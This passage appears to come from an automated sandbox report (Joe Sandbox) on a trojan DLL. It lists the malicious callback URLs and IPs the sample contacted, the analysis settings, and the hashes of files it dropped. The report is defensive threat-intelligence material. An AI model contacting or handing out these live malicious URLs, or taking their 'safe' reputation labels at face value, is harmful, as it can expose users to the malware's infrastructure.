                          http://mmmmmm.casa/drew/vdHEwGKNJDH5VthHkA9T/Z5WmkGRrBb11dvjiUNh/WxiZR4Pd4dpgWoud6Glfdx/X118IwtCBnG_loaddll32.exe, 00000000.00000002.869935510.00000000013FB000.00000004.00000020.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.mmmmmm.casa/drew/6V2kcoNh5zlkLfQFPc/BK1xvKoki/sI2xcD400Cdl5_2BfFpM/88ymBYA3Lf0RW9scFqJ/hZrundll32.exe, 00000004.00000002.872734570.00000000034FE000.00000004.00000020.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.mmmmmm.casa/ZZq/Ef7PDUJU5SDC1JS1Awcbloaddll32.exe, 00000000.00000002.869935510.00000000013FB000.00000004.00000020.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://crl.thawte.com/ThawteTimestampingCA.crl0SwFlsh32.dllfalse
                            		high
                            http://mmmmmm.casa/drew/O89kIoYukkHw2iqX/AhMjsf0VV5QFYgZ/kFHoGSUTql5nMATTez/zlGIspUJ0/j76OVsrTt0Nd7sregsvr32.exe, 00000002.00000002.871888522.0000000003279000.00000004.00000020.sdmp, regsvr32.exe, 00000002.00000002.871545750.0000000003246000.00000004.00000020.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://mmmmmm.barloaddll32.exe, 00000000.00000002.869935510.00000000013FB000.00000004.00000020.sdmp, regsvr32.exe, 00000002.00000002.871690172.000000000325B000.00000004.00000020.sdmp, regsvr32.exe, 00000002.00000003.648054115.0000000003260000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.647465029.0000000003260000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.413679126.0000000000A62000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.481393127.0000000000A52000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000002.869953373.00000000009EA000.00000004.00000020.sdmp, rundll32.exe, 00000004.00000003.377498345.0000000003521000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.482170353.0000000003512000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.mmmmmm.casa/drew/34vM2Qz4NrxAJPso/55_2BO7dEpmqKKz/UfdYfTV2D9XUJnIX4u/wEi6o1JYk/kRFDZ6mK40rundll32.exe, 00000004.00000002.872734570.00000000034FE000.00000004.00000020.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.mmmmmm.casa/loaddll32.exe, 00000000.00000003.740049295.000000000147F000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000002.871455463.000000000323B000.00000004.00000020.sdmp, rundll32.exe, 00000003.00000002.870070028.0000000000A4F000.00000004.00000020.sdmp, rundll32.exe, 00000003.00000003.693044334.0000000000A4F000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000002.869953373.00000000009EA000.00000004.00000020.sdmp, rundll32.exe, 00000004.00000002.872734570.00000000034FE000.00000004.00000020.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://mmmmmm.bar/drew/JYo2yh7o/xmmHqBu82xYT0h_2FY7FLhd/BDSs1jeYDH/q9Uyq_2F_2F5Uhp3O/kDGBT1_2BMID/BPloaddll32.exe, 00000000.00000002.870103614.0000000001454000.00000004.00000020.sdmp, loaddll32.exe, 00000000.00000002.869913578.00000000013F0000.00000004.00000020.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.mmmmmm.casa/drew/cD2Ewm7iGqMWPOkoVh2Hr/lSdxksgYA4mJEN42/6hG4ODNyYAH539U/3fuQQ5LlKDI4bM1b7rundll32.exe, 00000003.00000002.870070028.0000000000A4F000.00000004.00000020.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.mmmmmm.casaEF8I9tePbbl/e0WI0OeHAABDBK_2/BGgWBLhnrCwIX2a/eY2i6bDO1XsEiKpdI_/2Ffj5yrES/XUkdrundll32.exe, 00000003.00000002.869953373.00000000009EA000.00000004.00000020.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://mmmmmm.casa/drew/6V2kcoNh5zlkLfQFPc/BK1xvKoki/sI2xcD400Cdl5_2BfFpM/88ymBYA3Lf0RW9scFqJ/hZxCNorundll32.exe, 00000004.00000002.872832088.0000000003522000.00000004.00000020.sdmp, rundll32.exe, 00000004.00000002.872734570.00000000034FE000.00000004.00000020.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.mmmmmm.casa/JYo2yh7o/xmmHqBu82xYT0h_2FY7FLhd/BDSs1jeYDH/q9Uyq_2F_2F5Uhp3O/kDGBT1_2BMID/BPloaddll32.exe, 00000000.00000002.870103614.0000000001454000.00000004.00000020.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://mmmmmm.bar/drew/Htyh5S8h84hbP2LWKCnr_2B/LXaNEtu8OD/TOWxqpFfEELBfr4th/bCzBcRjTPZk7/6OgXjGc_2B_{787ACDA7-73DB-11EC-90E5-ECF4BB2D2496}.dat.20.dr, ~DFEFA0E4FB69B66F60.TMP.20.drfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://mmmmmm.bar/drew/QlXIpR0wndbmqlxV0/E1uaBwmWK3WR/XxTfKB75z9_/2F5qjg8wQ5TOnj/tny31CDfamMmuOmtnZ4{99D3DE7F-73DB-11EC-90E5-ECF4BB2D2496}.dat.39.dr, ~DFECE1085EE4C694FA.TMP.39.drfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://ocsp.thawte.com0SwFlsh32.dllfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.mmmmmm.casa/xrundll32.exe, 00000003.00000002.869953373.00000000009EA000.00000004.00000020.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown

                            Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public

                            IPDomainCountryFlagASNASN NameMalicious
                            31.41.45.66
                            		mmmmmm.barRussian Federation
                            		56577ASRELINKRUtrue
                            198.54.117.210
                            		unknownUnited States
                            		22612NAMECHEAP-NETUStrue
                            162.255.119.219
                            		mmmmmm.casaUnited States
                            		22612NAMECHEAP-NETUStrue
                            198.54.117.212
                            		unknownUnited States
                            		22612NAMECHEAP-NETUStrue
                            198.54.117.215
                            		parkingpage.namecheap.comUnited States
                            		22612NAMECHEAP-NETUSfalse
                            198.54.117.216
                            		unknownUnited States
                            		22612NAMECHEAP-NETUStrue

                            Private

                            IP
                            192.168.2.1

                            General Information

                            Joe Sandbox Version:34.0.0 Boulder Opal
                            Analysis ID:551599
                            Start date:12.01.2022
                            Start time:11:09:48
                            Joe Sandbox Product:CloudBasic
                            Overall analysis duration:0h 12m 5s
                            Hypervisor based Inspection enabled:false
                            Report type:light
                            Sample file name:SwFlsh32.exe (renamed file extension from exe to dll)
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                            Number of analysed new started processes analysed:47
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • HDC enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Detection:MAL
                            Classification:mal100.troj.evad.winDLL@46/91@34/7
                            EGA Information:
                            • Successful, ratio: 100%
                            HDC Information:
                            • Successful, ratio: 73.5% (good quality ratio 70.3%)
                            • Quality average: 80.9%
                            • Quality standard deviation: 27.9%
                            HCA Information:
                            • Successful, ratio: 93%
                            • Number of executed functions: 0
                            • Number of non-executed functions: 0
                            Cookbook Comments:
                            • Adjust boot time
                            • Enable AMSI
                            • Override analysis time to 240s for rundll32
                            Warnings:
                            Show All
                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, ielowutil.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                            • HTTP Packets have been reduced
                            • TCP Packets have been reduced to 100
                            • Excluded IPs from analysis (whitelisted): 23.203.70.208, 152.199.19.161
                            • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ie9comview.vo.msecnd.net, ctldl.windowsupdate.com, arc.msn.com, ris.api.iris.microsoft.com, e11290.dspg.akamaiedge.net, iecvlist.microsoft.com, go.microsoft.com, store-images.s-microsoft.com, go.microsoft.com.edgekey.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, cs9.wpc.v0cdn.net
                            • Not all processes where analyzed, report is missing behavior information
                            • Report size exceeded maximum capacity and may have missing behavior information.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.

                            Simulations

                            Behavior and APIs

                            TimeTypeDescription
                            11:10:51API Interceptor1x Sleep call for process: regsvr32.exe modified
                            11:10:51API Interceptor2x Sleep call for process: rundll32.exe modified

                            Joe Sandbox View / Context

                            IPs

                            No context

                            Domains

                            No context

                            ASN

                            No context

                            JA3 Fingerprints

                            No context

                            Dropped Files

                            No context

                            Created / dropped Files

                            C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{5DB6AF8A-73DB-11EC-90E5-ECF4BB2D2496}.dat
                            Process:C:\Program Files\internet explorer\iexplore.exe
                            File Type:Composite Document File V2 Document, Cannot read section info
                            Category:dropped
                            Size (bytes):6656
                            Entropy (8bit):2.476953171012265
                            Encrypted:false
                            SSDEEP:48:rgVGoLh6fGoLh9hmhohjhghaRha/hLhohjh5vzdh:Ur69rs6VyaQd6V5v/
                            MD5:29B7B5439616CDADA53CEBD7BB94FD0A
                            SHA1:CF477C3AFD7EE3B7A4FC4AF040957BA24A58DB15
                            SHA-256:928605F2DAED6827F201AF7020D439421F778B385513E6889F5D96529A9BCAF8
                            SHA-512:0115D8265AEC9D1769C65F04695BA1E8B988C4112069177B9192CE5ABF442340785DE99F67686B86591F24C28304D3E23A59F683EB6372C65D642CB4163E468C
                            Malicious:false
                            Preview: ......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y..........................................................................................If$..................K.j.j.a.q.f.a.j.N.2.c.0.u.z.g.v.1.l.4.q.y.5.n.f.W.e...........8...............................................................F.r.a.m.e.L.i.s.t...............................................................................................................O._.T.S.i.6.+.2.X.d.t.z.7.B.G.Q.5.e.z.0.u.y.0.k.l.g.=.=.........:.......................................
                            C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{787ACDA1-73DB-11EC-90E5-ECF4BB2D2496}.dat
                            Process:C:\Program Files\internet explorer\iexplore.exe
                            File Type:Composite Document File V2 Document, Cannot read section info
                            Category:dropped
                            Size (bytes):7168
                            Entropy (8bit):2.835590560218232
                            Encrypted:false
                            SSDEEP:48:rFFBh9FBhaxThVhdhX4h1T4hnphShoX4hnphShophEhdhX4h1xt2Sr:bv6jLXK1TKnPAeKnPA0+LXK1x4E
                            MD5:761AA343A3634CC069E4AC2A03A21504
                            SHA1:47C897FDF535683A02EB64D4951341BDC961BC3D
                            SHA-256:C33D5331C0A2EF2CB0C32AD64D04D69FEF9787D7642A08CABA8668342B701573
                            SHA-512:FA703791128D8DA16758D9CAD9CDF4455497BE2BE1CF21618EA9CF24A0C947C3C32C2587E10C6B5465B0C3F45D4BDFB1BC8857FB8D69E5D776967D2E1FAA6584
                            Malicious:false
                            Preview: ......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y..........................................................................................}.A..................K.j.j.a.q.f.a.j.N.2.c.0.u.z.g.v.1.l.4.q.y.5.n.f.W.e...........8...............................................................F.r.a.m.e.L.i.s.t...............................................................................................................O._.T.S.o.s.1.6.e.N.t.z.7.B.G.Q.5.e.z.0.u.y.0.k.l.g.=.=.........:.......................................
                            C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{8A934124-73DB-11EC-90E5-ECF4BB2D2496}.dat
                            Process:C:\Program Files\internet explorer\iexplore.exe
                            File Type:Composite Document File V2 Document, Cannot read section info
                            Category:dropped
                            Size (bytes):7168
                            Entropy (8bit):2.847382174211156
                            Encrypted:false
                            SSDEEP:96:w1A1tAnUnts1nPn31nPnoAnUncA3LAkW7:CUQPFPXUt3LAkW7
                            MD5:DE8D7970775DE8B7D4B5878DC2491A63
                            SHA1:ACF15D939858387084BC23278F19769D2FCFA787
                            SHA-256:F8BAA1E92B77892F1C42430448ED39CA828CA7EA4FA160C6CF15C0D20B18F5B9
                            SHA-512:4DCDB4F998BC849E557A6B2F5D1F471AF98A372E16440F75DE90C8988E0F7FD397B89C111F5F3B9467692F44FADF01FFA8157A97245B8520D9744CE88D97FEF1
                            Malicious:false
                            Preview: ......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y...........................................................................................)T..................K.j.j.a.q.f.a.j.N.2.c.0.u.z.g.v.1.l.4.q.y.5.n.f.W.e...........8...............................................................F.r.a.m.e.L.i.s.t...............................................................................................................O._.T.S.J.U.G.T.i.t.t.z.7.B.G.Q.5.e.z.0.u.y.0.k.l.g.=.=.........:.......................................
                            C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{99D3DE77-73DB-11EC-90E5-ECF4BB2D2496}.dat
                            Process:C:\Program Files\internet explorer\iexplore.exe
                            File Type:Composite Document File V2 Document, Cannot read section info
                            Category:dropped
                            Size (bytes):7168
                            Entropy (8bit):2.8422289061270867
                            Encrypted:false
                            SSDEEP:48:rEFOhLFOhnhn5hChoshhn5hChoRohvhA2hvh11ohahA2hvh1xVGDXGn:rGhnfwfnfwTJBJ10IBJ1xS8
                            MD5:14C8368E171CC43547E2A2B5EB39E090
                            SHA1:DA7C0705539C397F743D7ED6FCB03E13C5F962D5
                            SHA-256:255E290D2CC1EBA239540473A13953F071A7EFB52434950CF8AD69E6EC8BBF2A
                            SHA-512:D79D7965144E033C778FC8B5FB1FE68429418EB19116B29AEE4E40134D1503EF552D4379EAEDE47CE3A4C4C385AF58B4E520FDC7DFA0BEDAD911B62CEA9A0766
                            Malicious:false
                            Preview: ......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y..........................................................................................T.c..................K.j.j.a.q.f.a.j.N.2.c.0.u.z.g.v.1.l.4.q.y.5.n.f.W.e...........8...............................................................F.r.a.m.e.L.i.s.t...............................................................................................................O._.T.S.e.N.7.T.m.d.t.z.7.B.G.Q.5.e.z.0.u.y.0.k.l.g.=.=.........:.......................................
                            C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{AAFB84CD-73DB-11EC-90E5-ECF4BB2D2496}.dat
                            Process:C:\Program Files\internet explorer\iexplore.exe
                            File Type:Composite Document File V2 Document, Cannot read section info
                            Category:dropped
                            Size (bytes):5120
                            Entropy (8bit):1.9205276184639126
                            Encrypted:false
                            SSDEEP:24:r6XlYGW/whhLjG//whhrjgHhhqMJgHhh69lWbZ:rzGWIhVG/IhBjGhAThZ
                            MD5:C9C5E5423935DE64FDA5DBE8C46AA7C4
                            SHA1:7D35B011E56A876A21CAC702A2CF269A4BD43382
                            SHA-256:ED73F0A182F5C10475C47033986ED6D3881CC506431102FAFDBCE3A5E070D33B
                            SHA-512:A26B73E23E33183075B0AE2247E690803366A75D551EAA06AAEBC0F3AF8180C483CAD3B477091E09E869A8A3CA7EECB1A96C09731BCA9843FF83F6021300E58C
                            Malicious:false
                            Preview: ......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y..........................................................................................:.p..................K.j.j.a.q.f.a.j.N.2.c.0.u.z.g.v.1.l.4.q.y.5.n.f.W.e...........8...............................................................F.r.a.m.e.L.i.s.t...............................................................................................................O._.T.S.z.o.T.7.q.t.t.z.7.B.G.Q.5.e.z.0.u.y.0.k.l.g.=.=.........:.......................................
                            C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5DB6AF8C-73DB-11EC-90E5-ECF4BB2D2496}.dat
                            Process:C:\Program Files\internet explorer\iexplore.exe
                            File Type:Composite Document File V2 Document, Cannot read section info
                            Category:dropped
                            Size (bytes):4096
                            Entropy (8bit):2.293237510549754
                            Encrypted:false
                            SSDEEP:24:rd2G/Gij9lRht/2LKq3eF79dnxzG87Fh1o+MtiUV:rd2G/GiFn2LMZxJFc+ui
                            MD5:B6B3B65D577E300BEC5533B9CF9CFCBA
                            SHA1:8C0F838BE36F5BD2F6C5EEA669B7A14512A7999F
                            SHA-256:8DE16FE3F2D990EA5A0D76F2CC99EF3B7982E9DBA7183F012F13D4F885CDA9AB
                            SHA-512:4C7FA8F8DF9328029714237DCE5BCE05299CC7A748D6532F2C21E4909BC3A12C43217C85688A519609176FD76F81B1E33D7FB609B07A7EA60F708CBCEDCA248B
                            Malicious:false
                            Preview: ......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y............................................................................................!..................K.j.j.a.q.f.a.j.N.2.c.0.u.z.g.v.1.l.4.q.y.5.n.f.W.e...........8....................................................... .......T.r.a.v.e.l.L.o.g.......................................................................................................................................................................................................................
                            C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5DB6AF8E-73DB-11EC-90E5-ECF4BB2D2496}.dat
                            Process:C:\Program Files\internet explorer\iexplore.exe
                            File Type:Composite Document File V2 Document, Cannot read section info
                            Category:dropped
                            Size (bytes):4096
                            Entropy (8bit):2.3072282035960683
                            Encrypted:false
                            SSDEEP:24:r4G2HGy9llV9+5BtcXg531T5qrd9oH3h:r4G2HGAV9+5Lcwpig
                            MD5:85B631C2C803CB587B2E0FF3DF8691E7
                            SHA1:0FDBC391DC2C771E3D785861420C944E266020C7
                            SHA-256:1C6954B767D18A16710D6881E5E3152D8AB14B501604364DF288DBD635CE5668
                            SHA-512:35A879D7EEFCC9A7E78316574015A3CCDAA17484D8BF345C92FDE3C606B8D595413D6B2CB4424DF4FA581B6F9F745BEE2D4F42AC92BFA730C7D2D326A4D36187
                            Malicious:false
                            Preview: ......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.........................................................................................`..#..................K.j.j.a.q.f.a.j.N.2.c.0.u.z.g.v.1.l.4.q.y.5.n.f.W.e...........8.......................................................4.......T.r.a.v.e.l.L.o.g.......................................................................................................................................................................................................................
                            C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5DB6AF90-73DB-11EC-90E5-ECF4BB2D2496}.dat
                            Process:C:\Program Files\internet explorer\iexplore.exe
                            File Type:Composite Document File V2 Document, Cannot read section info
                            Category:dropped
                            Size (bytes):4096
                            Entropy (8bit):2.3038800200495992
                            Encrypted:false
                            SSDEEP:24:rzGcG2j9l2lzove6PiHx9405gBtSi/+bp8xlZZovgs8IwcF:rzGcG2qlzoraHU0gabp8x2vgI
                            MD5:0068A88E4255CB315FA4A61A60F5046C
                            SHA1:77C0519ADFD1C324619AB68A01BDF0B46AB7A5F8
                            SHA-256:2A9060B1FC128B8FF3D0A1F8BF6A578DAE8F2A3471E8772F7C9A416A7B02D1A6
                            SHA-512:E1A49EE514FE926FE8D86CFB80F44B7FF13746190B5CB77A64B460D493FD271F5D0BE6A73A44395D2080B544308D1444E32D5AEC8FFE073266339A6C81C532AA
                            Malicious:false
                            Preview: ......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.........................................................................................."..................K.j.j.a.q.f.a.j.N.2.c.0.u.z.g.v.1.l.4.q.y.5.n.f.W.e...........8.......................................................,.......T.r.a.v.e.l.L.o.g.......................................................................................................................................................................................................................
                            C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{787ACDA3-73DB-11EC-90E5-ECF4BB2D2496}.dat
                            Process:C:\Program Files\internet explorer\iexplore.exe
                            File Type:Composite Document File V2 Document, Cannot read section info
                            Category:dropped
                            Size (bytes):5120
                            Entropy (8bit):2.6332290007440555
                            Encrypted:false
                            SSDEEP:24:rNrrGicGW9llW0AK/cK99C86xRgyLQP/Xk69lRW0AK/cK9j86xRgyLQP/Xk:rNrrGicGoW0A2yRgyLSW0ATyRgyL
                            MD5:B67FFB5B7D73BE88952EEAD5461E59B0
                            SHA1:4AA4C25E7B1F24615D2B27D37D7C26E328D8D1B5
                            SHA-256:4634F8A334C2D2523D91FA158D759FBAA75DC36D9C5870CF015E83E728F7D6E3
                            SHA-512:8C784466B73041A5C2FC6C7697B0084B65242E7996BE29DD411A05DDCADAB0AED0914F09D66F87E0BF4555A26BB7DC6AA0F9883537DFA6907EA6367B7289DB69
                            Malicious:false
                            Preview: ......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.........................................................................................@k.@..................K.j.j.a.q.f.a.j.N.2.c.0.u.z.g.v.1.l.4.q.y.5.n.f.W.e...........8.......................................................(.......T.r.a.v.e.l.L.o.g.......................................................................................................................................................................................................................
                            C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{787ACDA5-73DB-11EC-90E5-ECF4BB2D2496}.dat
                            Process:C:\Program Files\internet explorer\iexplore.exe
                            File Type:Composite Document File V2 Document, Cannot read section info
                            Category:dropped
                            Size (bytes):5120
                            Entropy (8bit):2.651067094827395
                            Encrypted:false
                            SSDEEP:24:rNGDGm9l8f83lSh71Dw4wdZq6hET2g469lUpy83lSh71DAwdZq6hET2g4:rNGDGH83AN5Qd3pgMc83AN5Vd3pg
                            MD5:685C2D4C57330ADE5D490A262BF28CDF
                            SHA1:41E24A249B17641A538334966C249C10207934D5
                            SHA-256:7F994ED03153AB3A6B9FED8B370BB3091A2F264636F1FA872AFDF7B413384DE3
                            SHA-512:20B0DE6E7498A73D4A6D615BF5BCDFF0BB3B65DA8D46BEA224E651177EA4085A443037349B0729EDC5068CC70FEA8E553517C1EC78E73B16C519CF7F9DA5D597
                            Malicious:false
                            Preview: ......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y...........................................................................................[A..................K.j.j.a.q.f.a.j.N.2.c.0.u.z.g.v.1.l.4.q.y.5.n.f.W.e...........8.......................................................8.......T.r.a.v.e.l.L.o.g.......................................................................................................................................................................................................................
                            C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{787ACDA7-73DB-11EC-90E5-ECF4BB2D2496}.dat
                            Process:C:\Program Files\internet explorer\iexplore.exe
                            File Type:Composite Document File V2 Document, Cannot read section info
                            Category:dropped
                            Size (bytes):5120
                            Entropy (8bit):2.646053986914965
                            Encrypted:false
                            SSDEEP:48:rXGoGInPEpXk6mgWxQogZ0nPEpXk6mdWxQogZ:X4g404n4
                            MD5:B8651BA6D187AD9135DE5B07928C5A6F
                            SHA1:642FA4415D4F220374914EEF0716299D49BA93FC
                            SHA-256:8A6C4E5E0B7DDD2574F7E63A639C6CA26CD0C324AD23623545B22CF72BDAB42C
                            SHA-512:DF45829CF53011BF30DD5C95B019E58A7352723AA1473D0DA13B7CF925C60CAB0558BEA9359E47411FB89EBF17CEA35011E49807EBCD8826CA288A2282FFA476
                            Malicious:false
                            Preview: ......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y..........................................................................................}.A..................K.j.j.a.q.f.a.j.N.2.c.0.u.z.g.v.1.l.4.q.y.5.n.f.W.e...........8.......................................................,.......T.r.a.v.e.l.L.o.g.......................................................................................................................................................................................................................
                            C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{787ACDA9-73DB-11EC-90E5-ECF4BB2D2496}.dat
                            Process:C:\Program Files\internet explorer\iexplore.exe
                            File Type:Composite Document File V2 Document, Cannot read section info
                            Category:dropped
                            Size (bytes):5120
                            Entropy (8bit):2.6375431059763157
                            Encrypted:false
                            SSDEEP:48:r0GJGiBmWw1U/Q8HW5NVmWw1U/QxHW5N:Rlo5NVlv5N
                            MD5:24FDA29DE45F911305BC03C712EFAAE8
                            SHA1:9CE6D5414D38EB3D2D8DA4EF2DE7FEB13276AD36
                            SHA-256:01EF69BE420597C5E9DE4DE1FE3C24C8C830161DAD9F388C70282BD68BEA5419
                            SHA-512:7C12520FBDCD4DE935982215C923FA8FB7FE1F620B4FA1A3B0BE43AC7408B35225E19A487E45D407729A64AE648F94F4E3289FDC0187BB70B7CE05BA49016364
                            Malicious:false
                            Preview: ......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.........................................................................................PS.A..................K.j.j.a.q.f.a.j.N.2.c.0.u.z.g.v.1.l.4.q.y.5.n.f.W.e...........8.......................................................0.......T.r.a.v.e.l.L.o.g.......................................................................................................................................................................................................................
                            C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{8A934126-73DB-11EC-90E5-ECF4BB2D2496}.dat
                            Process:C:\Program Files\internet explorer\iexplore.exe
                            File Type:Composite Document File V2 Document, Cannot read section info
                            Category:dropped
                            Size (bytes):4096
                            Entropy (8bit):2.295631259736218
                            Encrypted:false
                            SSDEEP:24:rFGiEGm9l8TXQW14wl2zXhwLmgPQqBTluzSH7MXclq6Nv0v8XKtIe:rFGiEGrgW/mRwLzMXU3XKt
                            MD5:5E60B22F31E39C51F88E4C4EDEEF5C14
                            SHA1:5B8043A4479BCFA46B989BD04A4CC5FF546708EA
                            SHA-256:5A988BBDE35C87800CAB857F4979B089B772C97858E51DB6D6D451EF1A88329D
                            SHA-512:15B9A8F66847500D9DA82DA5A200A47ECA8B37664AA5F52430418149A5A693849C4AE99FBA684DABA3C53A5B66C61E27C89DCD6535B49F5BA726FCE112C3C683
                            Malicious:false
                            Preview: ......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y..........................................................................................C.N..................K.j.j.a.q.f.a.j.N.2.c.0.u.z.g.v.1.l.4.q.y.5.n.f.W.e...........8.......................................................(.......T.r.a.v.e.l.L.o.g.......................................................................................................................................................................................................................
                            C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{8A934128-73DB-11EC-90E5-ECF4BB2D2496}.dat
                            Process:C:\Program Files\internet explorer\iexplore.exe
                            File Type:Composite Document File V2 Document, Cannot read section info
                            Category:dropped
                            Size (bytes):5632
                            Entropy (8bit):2.565016832392845
                            Encrypted:false
                            SSDEEP:48:rZG+GbWbyzvAcSLOSLavwHWnuzvAcSLOSLavwHWn:7yTyF2uTyF2
                            MD5:64858339BA9545584219DA6365107A13
                            SHA1:55C2BCE25EEC6B36815753CB8B5FF863FA428B80
                            SHA-256:342A8BBA82D79BBC089147A0FE69CF961214FADE48F0838FC56186A75C6C0BD2
                            SHA-512:1164577470C8874342E6260F56D915AED28FAE6C0797AB5384AEFDEEAA0AC8CD5FBFDF3D3DA2ED3184C4259A0A37120BBF3C45E16A7FD3E9220680526DB913D4
                            Malicious:false
                            Preview: ......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y............................................................................................S..................K.j.j.a.q.f.a.j.N.2.c.0.u.z.g.v.1.l.4.q.y.5.n.f.W.e...........8.......................................................<.......T.r.a.v.e.l.L.o.g.......................................................................................................................................................................................................................
                            C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{8A93412A-73DB-11EC-90E5-ECF4BB2D2496}.dat
                            Process:C:\Program Files\internet explorer\iexplore.exe
                            File Type:Composite Document File V2 Document, Cannot read section info
                            Category:dropped
                            Size (bytes):4096
                            Entropy (8bit):2.27159334471043
                            Encrypted:false
                            SSDEEP:24:rhGak2Ge9lxUjMATPvWALGJa/j4WvbfUUQiIEbVa1s:rhGak2GwUjMAC/Ja/jfbfi8g1
                            MD5:CDEBE3DD0A7F24A3462B4391290BBCE5
                            SHA1:8B6EBAB730A6ACDEE9E25A6AADE5AC3AF1B19E48
                            SHA-256:E12609E2B06B477670AB835985C50FF50C0864A1CF185B132103E8D834E4C52F
                            SHA-512:9D7A157F6EA304BDBEED7D82F99B5175F5C3B7D7544E5903C45B76AEEA06251389898348B449873FFECE7EE7F6597D9BE8DB70CDB985F51D4147B13591E18A86
                            Malicious:false
                            Preview: ......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y..........................................................................................e.Q..................K.j.j.a.q.f.a.j.N.2.c.0.u.z.g.v.1.l.4.q.y.5.n.f.W.e...........8...............................................................T.r.a.v.e.l.L.o.g.......................................................................................................................................................................................................................
                            C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{8A93412C-73DB-11EC-90E5-ECF4BB2D2496}.dat
                            Process:C:\Program Files\internet explorer\iexplore.exe
                            File Type:Composite Document File V2 Document, Cannot read section info
                            Category:dropped
                            Size (bytes):5120
                            Entropy (8bit):2.638761603113303
                            Encrypted:false
                            SSDEEP:48:rWGi1Go70Al7DuTF7Hbg/c70Al7DrTF7Hbg/:yIZG/cI8G/
                            MD5:5F3DF70B8E5F7676C6A513DD54AF36BF
                            SHA1:3A26A5AF19CF9E9F91648FA21CC5200FE73299B4
                            SHA-256:4B783C298411964607AE732236191277EE1966E0F26F3FF05789539599E8DBDE
